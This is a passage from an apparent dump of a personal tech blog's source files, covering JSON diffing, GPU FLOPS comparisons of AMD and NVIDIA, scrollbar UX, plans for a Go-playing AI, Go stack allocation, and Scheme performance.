them.\n\nThe [HashDiff](https://github.com/liufengyun/hashdiff) format for paths (eg. `foo[0].bar`) is awkward for machines and not that nice for humans to read.\n\n[RFC 6902](http://tools.ietf.org/html/rfc6902) is the go-to standard. Unfortunately, it chose to use [RFC 6901](http://tools.ietf.org/html/rfc6901), aka. JSON pointer, for paths (eg. `/foo/0/bar`).\n\nI have no idea why [RFC 6902](http://tools.ietf.org/html/rfc6902) did not simply use a list of strings and numbers. It is easy for humans to read, easy for machines to traverse (they have to convert the string to that list otherwise), and while it does save a few bytes when serialized, [RFC 6902](http://tools.ietf.org/html/rfc6902) is far from being a dense format to begin with. 
Finally, JSON pointer is forced to use a quirky escaping system: slashes are converted to `~1` and tildes to `~0`.\n\nBut it is the standard… so I accepted its flaws and rolled with it.\n\n## The road is long but fogless\n\nAs I wished that this had existed when I went fishing for an appropriate library, I published this new algorithm as a [gem](https://rubygems.org/gems/json-diff), whose open-source repository is [right here](https://github.com/espadrine/json-diff).\n\nThere are countless possible improvements we could make. Off the top of my head:\n\n* Optional LCS,\n* String diffing,\n* SVG output.\n\n## Epilogue\n\nThis diffing algorithm allowed me to detect three problematic bugs which therefore never impacted anyone. When we switched to the new search engine, we gradually increased the proportion of users that it impacted. The higher it went, the more confident we were, until we reached 100%.\n\nWe changed the engine with the train at full throttle. Nobody noticed a thing!\n\n<script type=\"application/ld+json\">\n{ \"@context\": \"http://schema.org\",\n \"@type\": \"BlogPosting\",\n \"datePublished\": \"2016-10-26T21:34:00Z\",\n \"keywords\": \"sync\" }\n</script>\n"
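For reference, a sketch of the similarity described above; it is simplified, and not the json-diff gem's exact implementation:

    // Similarity in [0, 1]: average over the union of keys for
    // objects, average of best matches for arrays, value equality
    // for atoms.
    function similarity(a, b) {
      if (Array.isArray(a) && Array.isArray(b)) {
        if (a.length === 0 && b.length === 0) { return 1; }
        var total = 0;
        a.forEach(function(ea) {
          var best = 0;
          b.forEach(function(eb) {
            best = Math.max(best, similarity(ea, eb));
          });
          total += best;
        });
        return total / Math.max(a.length, b.length);
      } else if (a !== null && b !== null &&
                 typeof a === 'object' && typeof b === 'object') {
        var keys = Object.keys(a);
        Object.keys(b).forEach(function(k) {
          if (keys.indexOf(k) < 0) { keys.push(k); }
        });
        if (keys.length === 0) { return 1; }
        var sum = 0;
        keys.forEach(function(k) { sum += similarity(a[k], b[k]); });
        return sum / keys.length;
      }
      return a === b ? 1 : 0; // Atoms: value equality.
    }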
},
{
"alpha_fraction": 0.6681157350540161,
"alphanum_fraction": 0.7379070520401001,
"avg_line_length": 57.84651184082031,
"blob_id": "2087402c67d91641d7a34a86f00de0d029f8559c",
"content_id": "81d4da8dec42b93faa25c851f70c711f87fa3e08",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 12731,
"license_type": "no_license",
"max_line_length": 199,
"num_lines": 215,
"path": "/blog/src/recomputing-gpu-performance.md",
"repo_name": "espadrine/espadrine.github.com",
"src_encoding": "UTF-8",
"text": "# Recomputing ML GPU performance: AMD vs. NVIDIA\n\nI am pretty impressed seeing [Lisa Su][] doing her best to steer the AMD ship towards\nbetter AI support in GPUs, with the [Huggingface partnership][] and by convincing\nGeorge Hotz to submit more bug reports.\n\n(For context, [Hotz raised $5M][] to improve RX 7900 XTX support and sell a $15K\nprebuilt consumer computer that runs 65B-parameter LLMs. A plethora of driver\ncrashes later, he almost [gave up on AMD][].)\n\nThere’s quite a few issues to overcome, though.\nWhile that GPU is great\n([Stable Diffusion iteration speed per GPU cost][] is top-tier),\na cursory study would be flawed:\npublic GPU benchmarks like TechPowerUp, TomsHardware, etc. give:\n\n- **RX 7900 XTX:** [123 TFLOPS][RX public perf]\n- **RTX 4090:** [82.58 TFLOPS][RTX public perf]\n\nWhere do the figures come from?\n\nWhile there is no official breakdown,\nonly [official figures][RX 7900 XTX specs], people widely compute it this way:\n\n- For **NVIDIA**:\n [Boost Clock (THz) × CUDA Cores × 2][RTX 4090 specs]\n (since the FMA instruction does two floating-point operations\n (a multiplication and an addition) in 1 CUDA core cycle).\n- For **AMD** on RDNA3:\n [Boost Frequency (THz) × Stream processors × 2 (dual issue) × 4 (dot product)][RX 7900 XTX specs],\n as [RDNA3 has `V_DUAL_DOT2ACC_F32_F16`][RDNA3],\n which does two dot products (a×b+c×d+e, 4 operations),\n in 1 processor cycle.\n\n<table>\n <tr><th> Name </th><th> Price </th><th> Processors </th><th> Frequency </th><th> TFLOPS (FP16) </th><th> Perf/€ </th>\n <tr><td> <a href=\"https://www.amd.com/en/products/graphics/amd-radeon-rx-7900xtx\">RX 7900 XTX</a> </td>\n <td> €1110 </td><td> 6144 </td><td> 2.5 GHz </td><td> 122.88 </td><td> 0.1107 </td>\n <tr><td> <a href=\"https://www.amd.com/en/products/graphics/amd-radeon-rx-7900xt\">RX 7900 XT</a> </td>\n <td> €942 </td><td> 5376 </td><td> 2.4 GHz </td><td> 103.22 </td><td> 0.1096 </td>\n <tr><td> <a href=\"https://www.nvidia.com/en-us/geforce/graphics-cards/compare/#sectionenhanced_copy_54756033603dff4c2_db18_46bd_9cc1_e7ad0debbbd0\">RTX 4090</a> </td>\n <td> €1770 </td><td> 16384 </td><td> 2.52 GHz </td><td> 82.58 </td><td> 0.0467 </td>\n <tr><td> <a href=\"https://www.nvidia.com/en-us/geforce/graphics-cards/compare/#sectionenhanced_copy_44862952d932bba4_58ad_4ca4_a3d3_84a2295d2b85\">RTX 3060</a> </td>\n <td> €314 </td><td> 3584 </td><td> 1.78 GHz </td><td> 12.76 </td><td> 0.0405 </td>\n <tr><td> <a href=\"https://www.nvidia.com/en-us/geforce/graphics-cards/compare/#sectionenhanced_copy_44862952d932bba4_58ad_4ca4_a3d3_84a2295d2b85\">RTX 3080</a> </td>\n <td> €905 </td><td> 8704 </td><td> 1.71 GHz </td><td> 29.76 </td><td> 0.0329 </td>\n <tr><td> <a href=\"https://www.nvidia.com/en-us/geforce/graphics-cards/compare/#sectionenhanced_copy_44862952d932bba4_58ad_4ca4_a3d3_84a2295d2b85\">RTX 3090</a> </td>\n <td> €1500 </td><td> 10496 </td><td> 1.70 GHz </td><td> 35.68 </td><td> 0.0238 </td>\n</table>\n\nThat is an unjust comparison, though, because AMD’s instruction is more niche\nthan FMA (hitting this performance sweet spot is thus uncommon),\nand because both of those GPUs have other tricks up their sleeves,\nyielding superior FLOPS.\n\nThe [big one][Dettmers] on NVIDIA are [Tensor cores][].\nWith them, you can run an instruction that does\n[a 4×4 to 4×8 matrix multiplication (page 25)][Ampere]\nin 1 cycle within a single Tensor Core (32 CUDA cores).\n\n2×4^2×8 (matmul ops) ÷ 1 (cycles) = 256 ops/TC/cycle.\n\n(There is [some variation between NVIDIA 
(There is [some variation between NVIDIA GPUs][Ampere blog]\non which matrix sizes are supported and on how many cycles the instruction takes,\nand NVIDIA keeps major aspects of their instruction set secret,\nbut on recent 30- and 40-series, this 256 number seems fairly constant.)\n\nThat actually puts the RTX 4090 at\n256 × 512 (Tensor Cores) × 2.52 (GHz)\n÷ 1K (GHz per teracycle/s) = [330 TFLOPS in FP16][NVIDIA wiki]…\nMuch higher than the 123 TFLOPS that impressed Hotz on the RX 7900 XTX!\n\nBut AMD now has the same trick.\nIn [RDNA3][], with [WMMA][], the RX 7900 XTX has an instruction,\n[`V_WMMA_F16_16X16X16_F16`][RDNA3],\nthat does two 16×16 matrix multiplications in [32 cycles][AMD cycles],\nin a single Compute Unit (two sets of 32 threads).\n\n2×16^3 (matmul ops) × 2 ÷ 32 (cycles) = 512 ops/CU/cycle.\n\nThis uses the same underlying silicon circuits as `V_DUAL_DOT2ACC_F32_F16`:\nthe architecture lays out the matrices in Vector General-Purpose Registers.\nEach cell of the output matrix is computed by multiplying\none row from input matrix A with one column from input matrix B,\ntwo input cells at a time\n(two adjacent input A row cells packed inside the same VGPR,\nand two adjacent input B column cells packed together inside another VGPR),\nso they can be used by the packed dot product single-cycle instruction.\nWithin that same instruction, encoded as VOPD\n(a SIMD-like encoding that executes one operation\non an even register while another executes on an odd one at the same time),\nan adjacent output cell also multiplies through its first two input cells\nat the same time using dual issue.\n\nThe input row has size 16, so those two output cells are completed in 8 cycles.\nEach two adjacent output cells in their diagonal\nare computed with 16 parallel threads (on separate stream processors)\nwithin the same 8 cycles.\nWe have done two diagonals (32 output cells); there are 14 diagonals left.\nInside that Compute Unit, we still have 16 stream processors that we can use;\nthey can handle two more output diagonals within the same 8 cycles.\n\nOnce our first four diagonals are computed,\nwe sequentially compute the next 4 diagonals in the next 8 cycles.\nAnd so forth for the next 4, and the last 4 after that.\nIn total, we have computed the matrix multiplication\nin 32 cycles, which checks out.\n\nWhy can’t we do the matrix multiplication in 16 cycles\nby using all 64 threads inside the Compute Unit?\n[Section 7.6 of the instruction set manual][RDNA3] indicates:\n\n> [Dual issue] is legal only for wave32.\n\nWMMA supports both wave32 and wave64, but it sounds like dual issue is\ndeactivated in wave64, and thus it would still take 32 cycles,\nmaking wave64 an unfavorable (and poorly documented) proposition, I believe.\n\nAll in all, using [WMMA][], the RX 7900 XTX can crank through\n512 × [96 (Compute Units) × 2.5 (GHz)][RX 7900 XTX specs]\n÷ 1K (GHz per teracycle/s) = [123 TFLOPS in FP16][AMD wiki]…\n\nThat ends up being less than half the performance of the RTX 4090.\nThe superior number of operations per Compute Unit is offset by the\ncrushingly lower number of cores.\nPerhaps the AMD strategy is to have the better circuit ready\nbefore migrating to the TSMC N5 (“5 nm”) process at a less affordable price.\n\n
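Reusing the hypothetical `tflops` helper from the sketch above, the matrix-unit totals come out as:\n\n    # Matrix-unit throughput, with the ops/unit/cycle derived above.\n    print(tflops(2.52, 512, 256))  # RTX 4090 Tensor Cores: ~330\n    print(tflops(2.5, 96, 512))    # RX 7900 XTX WMMA: ~123\n\n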
In practice, the lower peak performance is less of an issue for AI training,\nbecause training workloads are famously limited in parallelization opportunities\n(even the best training runs typically achieve only 50% GPU utilization at a given time).\nThe VRAM bandwidth then matters a lot for large models,\nand the [RX 7900 XTX][RX 7900 XTX specs], despite using GDDR6 instead of GDDR6X,\nhas a higher bandwidth than the RTX 3090, thanks to its faster memory clock.\nStill, it is also lower than the RTX 4090 on that front\n(but at a lower price point).\n\n<table>\n <tr><th> Name </th><th> Price </th><th> TFLOPS (FP16) </th><th> Memory bandwidth (GB/s) </th><th> Value (TFLOPS·GB/s/€) </th>\n <tr><td> <a href=\"https://www.nvidia.com/en-us/geforce/graphics-cards/compare/#sectionenhanced_copy_54756033603dff4c2_db18_46bd_9cc1_e7ad0debbbd0\">RTX 4090</a> </td>\n <td> €1770 </td><td> 330 </td><td> 1008 </td><td> 188 </td>\n <tr><td> <a href=\"https://www.amd.com/en/products/graphics/amd-radeon-rx-7900xtx\">RX 7900 XTX</a> </td>\n <td> €1110 </td><td> 123 </td><td> 960 </td><td> 106 </td>\n <tr><td> <a href=\"https://www.nvidia.com/en-us/geforce/graphics-cards/compare/#sectionenhanced_copy_44862952d932bba4_58ad_4ca4_a3d3_84a2295d2b85\">RTX 3080</a> </td>\n <td> €905 </td><td> 119 </td><td> 760 </td><td> 100 </td>\n <tr><td> <a href=\"https://www.nvidia.com/en-us/geforce/graphics-cards/compare/#sectionenhanced_copy_44862952d932bba4_58ad_4ca4_a3d3_84a2295d2b85\">RTX 3090</a> </td>\n <td> €1500 </td><td> 143 </td><td> 936 </td><td> 89 </td>\n <tr><td> <a href=\"https://www.amd.com/en/products/graphics/amd-radeon-rx-7900xt\">RX 7900 XT</a> </td>\n <td> €942 </td><td> 103 </td><td> 800 </td><td> 87 </td>\n <tr><td> <a href=\"https://www.nvidia.com/en-us/geforce/graphics-cards/compare/#sectionenhanced_copy_44862952d932bba4_58ad_4ca4_a3d3_84a2295d2b85\">RTX 3060</a> </td>\n <td> €314 </td><td> 51 </td><td> 360 </td><td> 58 </td>\n</table>\n\nThus the RX 7900 XTX does not technically offer the best TFLOPS per price,\nas was presumed in Hotz’s [raise announcement][Hotz raised $5M].\nBut that metric is not crucial for the purpose of building LLM machines,\nand purely looking at hardware, that GPU is a fine choice for the task,\nin part because it offers more RAM per dollar:\nit can hold a large model without needing pricier GPUs,\nwhile likely reaching reasonable inference speeds.\n\nThe other thorns in AMD’s side for AI, though, rear their ugly heads:\n- [The compilers don’t produce great instructions][microbenchmark];\n- The drivers crash frequently: ML workloads feel experimental;\n- Software adoption is getting there,\n but kernels are less optimized within frameworks,\n in particular because of the fracture between ROCm and CUDA.\n When you are a developer and you need to write code twice,\n one version won’t be as good, and it is the one with less adoption;\n- StackOverflow mindshare is smaller.
\n Debugging problems is thus harder,\n as fewer people have encountered them.\n\n(I will note, however, that the wealth of low-level information provided by AMD\ntremendously outshines NVIDIA’s,\neven though AMD could do a better job of popularizing those subtleties and\nof explaining how to perform specific workloads like BERT training,\nsomething into which NVIDIA puts welcome care.\nJust contrast [NVIDIA’s matmul page][NVIDIA GEMM] to [AMD’s][WMMA].\n[AMD doesn’t even recognize its own flagship GPUs as supported for ROCm][ROCm support],\nwhich is mind-boggling when compared to NVIDIA’s blanket CUDA support.)\n\n[Lisa Su]: https://twitter.com/LisaSu/status/1669848494637735936\n[Huggingface partnership]: https://huggingface.co/blog/huggingface-and-amd\n[Hotz raised $5M]: https://geohot.github.io//blog/jekyll/update/2023/05/24/the-tiny-corp-raised-5M.html\n[gave up on AMD]: https://github.com/RadeonOpenCompute/ROCm/issues/2198#issuecomment-1574383483\n[Stable Diffusion iteration speed per GPU cost]: https://www.tomshardware.com/news/stable-diffusion-gpu-benchmarks\n[RX public perf]: https://www.tomshardware.com/reviews/amd-radeon-rx-7900-xtx-and-xt-review-shooting-for-the-top\n[RTX public perf]: https://www.techpowerup.com/gpu-specs/geforce-rtx-4090.c3889\n[RTX 4090 specs]: https://www.nvidia.com/en-us/geforce/graphics-cards/compare/#sectionenhanced_copy_54756033603dff4c2_db18_46bd_9cc1_e7ad0debbbd0\n[RX 7900 XTX specs]: https://www.amd.com/en/products/graphics/amd-radeon-rx-7900xtx\n[RDNA3]: https://www.amd.com/system/files/TechDocs/rdna3-shader-instruction-set-architecture-feb-2023_0.pdf\n[Dettmers]: https://timdettmers.com/2023/01/30/which-gpu-for-deep-learning/#Will_AMD_GPUs_ROCm_ever_catch_up_with_NVIDIA_GPUs_CUDA\n[Tensor Cores]: https://www.nvidia.com/en-us/data-center/tensor-cores/\n[Ampere]: https://www.nvidia.com/content/PDF/nvidia-ampere-ga-102-gpu-architecture-whitepaper-v2.pdf\n[Ampere blog]: https://developer.nvidia.com/blog/nvidia-ampere-architecture-in-depth/\n[NVIDIA wiki]: https://en.wikipedia.org/wiki/GeForce_40_series#Desktop\n[WMMA]: https://gpuopen.com/learn/wmma_on_rdna3/\n[AMD cycles]: https://github.com/RadeonOpenCompute/amd_matrix_instruction_calculator/blob/339d784e56e55752495192b0781ea162fc32e323/matrix_calculator.py#LL1139C26-L1139C26\n[ROCm support]: https://rocm.docs.amd.com/en/latest/release/gpu_os_support.html\n[NVIDIA GEMM]: https://docs.nvidia.com/deeplearning/performance/dl-performance-matrix-multiplication/index.html\n[AMD wiki]: https://en.wikipedia.org/wiki/RDNA_3#Desktop\n[microbenchmark]: https://chipsandcheese.com/2023/01/07/microbenchmarking-amds-rdna-3-graphics-architecture/\n\n---\n\n[Comments on Reddit](https://www.reddit.com/r/espadrine/comments/156bbmj/recomputing_gpu_performance/).\n\n<script type=\"application/ld+json\">\n{ \"@context\": \"http://schema.org\",\n \"@type\": \"BlogPosting\",\n \"datePublished\": \"2023-06-18T21:40:09Z\",\n \"keywords\": \"gpu, ml\" }\n</script>\n"
},
{
"alpha_fraction": 0.7300699353218079,
"alphanum_fraction": 0.7496503591537476,
"avg_line_length": 50.07143020629883,
"blob_id": "d4fed191ac55f1d8e4a1c646b9e44bcd7184b701",
"content_id": "88de8a2ed481b152529d59eaab1e909823b45171",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 715,
"license_type": "no_license",
"max_line_length": 227,
"num_lines": 14,
"path": "/blog/src/scrollbar-ux-improvements.md",
"repo_name": "espadrine/espadrine.github.com",
"src_encoding": "UTF-8",
"text": "# Scrollbar UX Improvements\n\nThe UX of scrollbars is pretty bad, apart from drag-and-drop. Left-clicking on the empty space more than once quickly switches meaning, as the scrollbar reaches your mouse.\n\nLeft-clicking should do what middle-clicking does in KDE, as it is much saner: it scrolls to where you click.\n\nInstead, middle-clicking should systematically go down by a page. It is much more common to go one page down (to continue reading) than it is to go one page up. It should not switch direction as the scrollbar reaches the mouse.\n\n<script type=\"application/ld+json\">\n{ \"@context\": \"http://schema.org\",\n \"@type\": \"BlogPosting\",\n \"datePublished\": \"2016-06-18T23:50:00Z\",\n \"keywords\": \"web\" }\n</script>\n"
},
{
"alpha_fraction": 0.7663499712944031,
"alphanum_fraction": 0.7743356823921204,
"avg_line_length": 57.57258224487305,
"blob_id": "3af019265c59ebec9cd7dda7f9adcb615ac27345",
"content_id": "2f4649f3af920c08d587f8d2389b9384a961e37e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 7272,
"license_type": "no_license",
"max_line_length": 228,
"num_lines": 124,
"path": "/blog/src/a-go-browser-battle.md",
"repo_name": "espadrine/espadrine.github.com",
"src_encoding": "UTF-8",
"text": "# A Go Browser Battle\n\nI learned Go from my Dad — after all, we lived in Japan for a short while when I was little — but DeepMind's [foray][alphago-2017] into the venerable board game definitely renewed my interest.\n\n[alphago-2017]: https://events.google.com/alphago2017/\n\nMy friend [Jan], also intrigued, had started working on a browser-based interface to play the game.\n\n[Jan]: https://github.com/jankeromnes/\n\nSo I offered him a playful challenge: we would both try to build an interesting AI for the game, and we would pit them against each other.\nEach AI would be in a separate [WebWorker].\nAt each turn, they would receive the board state.\nThey would have one minute to come up with their move, in a best-of-five tournament.\n\nFrom what he told me, Jan will be trying to brute-force the search tree with a traditional minimax.\nHe is betting on a smart and fast board evaluation.\n\nAs for me, I started studying the [AlphaGo Nature paper].\nI took machine learning classes at University; time to apply what I learned!\n\n[AlphaGo Nature paper]: https://storage.googleapis.com/deepmind-media/alphago/AlphaGoNaturePaper.pdf\n\nI definitely don't have the computing power or the time to reach the level that AlphaGo achieved.\nIt took months of training and self-play on tens of GPUs and hundreds of CPUs.\nMy dream is to reach 1d; a rank roughly equivalent to a black belt in martial arts.\n\n## Stepping Stones\n\nGo games are typically saved as [SGF] files, which are plentiful on the Web.\nTherefore, the first step I needed to achieve was to have an SGF parser and a Go execution engine.\nThe engine is designed to give me a wealth of information about the game: what group is a stone part of, how many liberties that group has…\n\n[SGF]: http://www.red-bean.com/sgf/\n\n\n\nI downloaded all KGS games involving players that are 4d or above.\nI hope my design achieves 1d, so in principle, the AI will never reach that level of play.\n\nAside: I think it is interesting to think about learning in terms of *training capacity* and *model capacity*.\nHere, since we learn to mimick the moves of the training set, the AI can only be as smart as the training set, which puts a limit to how intelligent it can be.\nBut the model itself can achieve a superior level through self-play (which is what DeepMind did, obviously, since they reached a level beyond the top human player). Then, the level they can achieve is that of the model capacity.\nAn entity able to perfectly analyse all possible futures would have the highest possible model capacity.\n\nThe KGS dataset represents 1.7 million games.\nAfter rotating and reflecting each game, I should reach 13.5 million games, which should be enough to teach the neural network.\n\n\n\nJust like AlphaGo, I will first train a **move guesser** using a convolutional neural network.\nThat network reads the board through a hundred lenses called \"filters\" that focus on 3x3 squares (or 5x5 on the first layer).\nEach lens annotates every intersection with an analysis of its surroundings.\nThe annotated board is given as input to a different set of lenses, and so on, ten times.\nThe last annotated board rates the moves with how likely KGS players are to make them.\n\nThe move guesser can be used standalone, although I don't expect it to perform well.\nIts main purpose is to limit the number of moves you will look at on the search tree.\nExpanding too many nodes can really make your AI lose precious time.\n\nI also want to train a **win guesser**. 
I also want to train a **win guesser**. It is another convolutional neural network.\nInstead of yielding likely moves, it will tell you who it thinks will win.\n\nWhile AlphaGo trained its win guesser from self-play games which also improved its move guesser, I am unsure whether I will have enough time to implement self-play tournaments.\nBut having a win guesser learn from the KGS data set is possible; it simply might yield poor results.\n\nFinally, if I have time to spare, I may implement **Monte-Carlo Tree Search** ([MCTS]).\nIt requires having a very fast move guesser (not the 10-layer monster).\nAlphaGo trained a shallower neural network for that purpose, feeding it, in addition to the board state, whether a given move matches a set of well-known patterns.\nThe paper claims it guesses about 24% of moves from their data set, at a meager 2 μs.\n\n[MCTS]: https://en.wikipedia.org/wiki/Monte-Carlo_Tree_Search\n\nFor this purpose, I am tempted to perform some custom statistical analysis on the training data.\nYet again, it depends on what that yields, and how much time I have.\n\nMCTS works by repeating the following steps (see the sketch after this list):\n\n1. walk the tree through what is currently the best move,\n2. without adding nodes to the search tree, play with the weak move guesser until the end of the game,\n3. update the node's ancestors in the search tree to count the number of wins and losses, which may change what the best move is.\n\nWhen a node is walked through enough times, it gets expanded with the strong move guesser.\n\n
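In pseudocode (a sketch with made-up interfaces: the board methods, `weak_move_guesser`, and `strong_move_guesser` are stand-ins for pieces that do not exist yet):\n\n    import math\n    \n    class Node:\n        def __init__(self, board):\n            self.board, self.children = board, {}\n            self.wins = self.visits = 0\n    \n    def ucb(parent, child):\n        # Favor winning moves, plus an exploration bonus for rarely-tried ones.\n        return (child.wins / (child.visits + 1)\n                + math.sqrt(2 * math.log(parent.visits + 1) / (child.visits + 1)))\n    \n    def mcts_step(root):\n        # 1. Walk the tree through what is currently the best move.\n        path = [root]\n        while path[-1].children:\n            parent = path[-1]\n            path.append(max(parent.children.values(), key=lambda c: ucb(parent, c)))\n        leaf = path[-1]\n        # 2. Without adding nodes, play out the game with the weak move guesser.\n        board = leaf.board.copy()\n        while not board.game_over():\n            board.play(weak_move_guesser(board))\n        won = board.winner() == root.board.current_player()\n        # 3. Update the ancestors' win counts, which may change the best move.\n        for node in path:\n            node.visits += 1\n            node.wins += won\n        # A node walked through enough times gets expanded with the strong guesser.\n        if leaf.visits > 40 and not leaf.children:\n            for move in strong_move_guesser(leaf.board):\n                leaf.children[move] = Node(leaf.board.play_copy(move))\n\n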
\"http://schema.org\",\n \"@type\": \"BlogPosting\",\n \"datePublished\": \"2017-06-16T16:53:49Z\",\n \"keywords\": \"baduk, ai\" }\n</script>\n"
},
{
"alpha_fraction": 0.7341254353523254,
"alphanum_fraction": 0.7471947073936462,
"avg_line_length": 98.67105102539062,
"blob_id": "9168701426aae8c298a9bee96204adce76f555c3",
"content_id": "20d6d4047d0d3384390ad20bd6f830a58dd02fce",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 7577,
"license_type": "no_license",
"max_line_length": 941,
"num_lines": 76,
"path": "/blog/src/close-to-the-metal.md",
"repo_name": "espadrine/espadrine.github.com",
"src_encoding": "UTF-8",
"text": "# Close to the metal\n\nWhat a strange expression. It is very much used by Go (the language) advocates (and by its authors; both titles overlap).\n\nMy understanding of \"**close to the metal**\" was that I knew at any point of the program when the memory I manipulate is on the stack or in the heap. As a result, I can reason about the memory layout and the efficiency of the data structures I create.\n\nIn fact, just like many fancy terms that I hear about programming languages, such as \"Write once, run everywhere\", \"Native\", \"App-scale\", and so on, this is just another expression of which I have yet to find the meaning.\n\nA couple of days ago, I came across [the following talk](http://talks.golang.org/2012/splash.article). One sentence really stood out in my head: \"it is legal (encouraged even) to take the address of a stack variable\".\n\nObviously, in most languages whose compiler I would call \"close to the metal\", taking the address of a stack variable is a very common operation. However, those languages have the habit of making the program crash if you are not careful about where data is freed, and what pointers point to. Yet, one of Go's redeeming qualities is to guarantee that pointer manipulation is safe (most of the time). What does it do to prevent the worst from happening?\n\nI wrote the following program with the intention of understanding how the compiler avoided a crash under the hood:\n\n package main\n \n import \"fmt\"\n \n func f() *int {\n i := 5\n pi := &i\n *pi ++\n fmt.Println(\"i = \", i)\n fmt.Println(\"pi = \", *pi)\n return pi\n }\n \n func main() {\n pi := f()\n fmt.Println(\"result = \", *pi)\n }\n\nI return a pointer that points to what I consider to be a stack variable, but really is simply a local variable. Then I dereference that pointer. If this was C, the stack variable would get destroyed upon returning from the function, and therefore the pointer would point to a forbidden address in memory. That should cause a crash.\n\nYou probably guessed at that point that this program doesn't crash. It returns the correct answer.\nHere goes the start of the generated assembly code for the function `f`, obtained with `go tool 6g -S program.go`:\n\n 0000 (program.go:5) TEXT f+0(SB),$152-8\n 0001 (program.go:6) MOVQ $type.int+0(SB),(SP)\n 0002 (program.go:6) CALL ,runtime.new+0(SB)\n 0003 (program.go:6) MOVQ 8(SP),CX\n 0004 (program.go:6) MOVL $5,(CX)\n 0005 (program.go:7) MOVQ CX,&i+-72(SP)\n 0006 (program.go:8) MOVL $1,AX\n 0007 (program.go:8) MOVQ CX,pi+-112(SP)\n 0008 (program.go:8) MOVL (CX),BP\n 0009 (program.go:8) ADDL AX,BP\n 0010 (program.go:8) MOVL BP,(CX)\n\nThe local variable `i` corresponds to the CX register. In it is placed the address of a freshly allocated heap slot the size of an `int`. We put 5 in the slot it points to, then we put CX to a slot on the stack which we say is the address of `i` (`&i+-72(SP)`), so that `i` is never conceptually on the stack.\n\nObviously, I then tried to make the function return `i` (the integer), instead of `pi` (the pointer to an integer). Then, the assembly clearly allocated memory for `i` on the stack, and `pi` did hold the address of a stack variable. In other words, the compiler tries to put the variable on the stack, and if that can hurt memory safety, it puts it on the heap.\n\nConsequence: in Go, knowing whether a variable is on the stack is non-trivial. 
Consequence: in Go, knowing whether a variable is on the stack is non-trivial.\nThe very same variable declaration can either occur on the stack or on the heap.\n\nI find this design great, but it does make me wonder what the authors mean by saying that the language is \"close to the metal\". This being said, knowing where the variable is stored doesn't matter, as long as we know the compiler does its best, and as long as we have tools to let us know where we can optimize, and what we can optimize.\n\nWhich brings me to **optimizing JavaScript**. I had an interesting discussion last summer with the great Benjamin Peterson, who did outstanding work on Firefox's JS engine. We were talking about the availability (or lack thereof) of tail-call optimization in interpreters and compilers.\nHis comment on implementing it was that the programmer should be able to state his/her intention, in order to get feedback of the following kind: \"We're sorry, we were unable to perform tail-call optimization because…\"\n\nI feel like programmers should be able to know whenever an optimization they hope to achieve doesn't get performed. In Go, the case of knowing whether the variable is on the stack is a contrived example. In JavaScript, where the same kinds of tricks as discussed above are found everywhere, knowing where a function gets deoptimized because an argument was assumed to be an integer, and the function suddenly gets called with a string, is a valuable piece of information. Why was a string passed in? It might even be a bug.\n\nIn ECMAScript, there is a valid statement, [`debugger`](http://es5.github.com/#x12.15), which probably does what you think it does. Nothing, unless you're debugging. Adding syntax to help programmers is a natural thing to do. There needs to be syntax to warn the programmer when an optimization he/she hoped for doesn't get triggered, without having him/her look at bytecode or assembly code.\n\nThere are some attempts in the wild. V8 comes with a switch, `--trace-deopt`, which will give you all information about deoptimizations in a format of dubious legibility. Firefox has some primitives that give information about things that could have been optimized. The great Brian Hackett even made an [addon](https://addons.mozilla.org/en-US/firefox/addon/jit-inspector/) which highlights in shades of red pieces of code that couldn't get boosted by the JIT engine. However, the information it gives is quite cryptic; it is unclear to mere mortals how they should change their code to get the boost. Also, it is quite hard to navigate, since it tracks all JS code throughout the browser. Programmers want to know how *their code* does, and they don't want to jump through hoops to get that information. However, the idea of painting your code in red is one step closer to being told, \"Hey, this piece of code should be rewritten this way\".\n\nOn the standards front, the closest thing you get is something they call [Guards](http://wiki.ecmascript.org/doku.php?id=strawman:guards). This strawman amounts to type annotations that you can put anywhere you have a binding. However, it specifies that the code should throw if the type we specify for a variable isn't that of the data we feed it. That isn't quite the same thing as having a way to check for an optimization at all. Yet, the syntax itself would be valuable to request information about a certain class of bailouts.\n\nThere is a lot yet to do to help programmers write code closer to the metal. What I do know is that current tools are only a glimpse of what we could have.\n
The \"Profiles\" tab in WebKit's DevTools is notoriously seldom used, compared to any other tab. The information it gives is a struggle to work with. [Flame graphs](http://www.cs.brown.edu/~dap/agg-flamegraph.svg) are the beginning of an answer. The question being not \"where is my code slow\" but \"what can I do to make it faster\", making tools that give you clues on how to improve that [jsperf](http://jsperf.com/) score is an art that is yet to harness.\n\n<script type=\"application/ld+json\">\n{ \"@context\": \"http://schema.org\",\n \"@type\": \"BlogPosting\",\n \"datePublished\": \"2012-12-12T16:48:00Z\",\n \"keywords\": \"go\" }\n</script>\n"
},
{
"alpha_fraction": 0.7303480505943298,
"alphanum_fraction": 0.7465780377388,
"avg_line_length": 87.17241668701172,
"blob_id": "878ca3c00412eecea487b547ae168e6253f3c957",
"content_id": "b46a81a844d47a4167f085e3e38b0d73d8c34dde",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 5114,
"license_type": "no_license",
"max_line_length": 735,
"num_lines": 58,
"path": "/blog/src/schemes-performance-conformance-openness.md",
"repo_name": "espadrine/espadrine.github.com",
"src_encoding": "UTF-8",
"text": "# Schemes: Performance, Conformance, Openness\n\nAs [Guile 2.0.10][] just rolled out, I wished to re-acquaint myself with the status of Schemes. I downloaded the new version, compiled it (boy, is it slow to compile), installed it. It is designed as a language to extend existing programs, much like Lua. One goal is obviously to make the interpreter as fast as can be. Ideally, it should be the LuaJIT of Scheme-land.\n\nThe other approach used to make Scheme run fast is to compile it. Other projects, such as Chicken Scheme, compile the code to C, and the result tends to have reasonable performance. They do also cut corners, as we'll see.\n\nLet's make one of the most simple non-trivial program. A looped factorial.\n\n (define (fact n)\n (let ((acc 1))\n (let loop ()\n (set! acc (* acc n))\n (set! n (- n 1))\n (if (zero? n) acc\n (loop)))))\n\nGuile has a number of handy helpers in REPL mode. Notably, `,h` will list all special commands that are available. That includes `,describe`, which gives documentation. For instance, `,describe get-internal-real-time` will tell you that it \"returns the number of time units since the interpreter was started\". Let's use that.\n\n (define (time-fact n)\n (let ((t (get-internal-real-time)))\n (fact n)\n (display (- 